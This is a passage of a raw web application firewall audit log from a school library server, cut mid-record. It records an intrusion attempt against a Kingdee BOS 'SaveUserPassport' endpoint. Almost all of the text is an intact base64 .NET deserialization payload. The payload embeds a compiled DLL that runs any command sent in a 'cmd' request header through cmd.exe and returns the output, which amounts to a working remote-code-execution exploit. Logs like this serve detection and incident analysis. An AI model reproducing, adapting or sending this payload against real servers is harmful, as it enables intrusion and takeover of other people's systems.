ACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=","format":"3"} --9d5ea850-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d5ea850-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=text/json"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747927407171924 5885 (- - -) Stopwatch2: 1747927407171924 5885; combined=3860, p1=654, p2=3094, p3=40, p4=38, p5=34, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d5ea850-Z-- --7bbc6d6c-A-- [22/May/2025:22:23:34 +0700] aC9Bdiektx75wRFPQygF5AAAAME 103.236.140.4 57450 103.236.140.4 8181 --7bbc6d6c-B-- POST /Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 15909 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Content-Type: text/json cmd: echo QZPuWzkJnV X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 163522810 --7bbc6d6c-C-- {"ap0":"AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNv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b2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1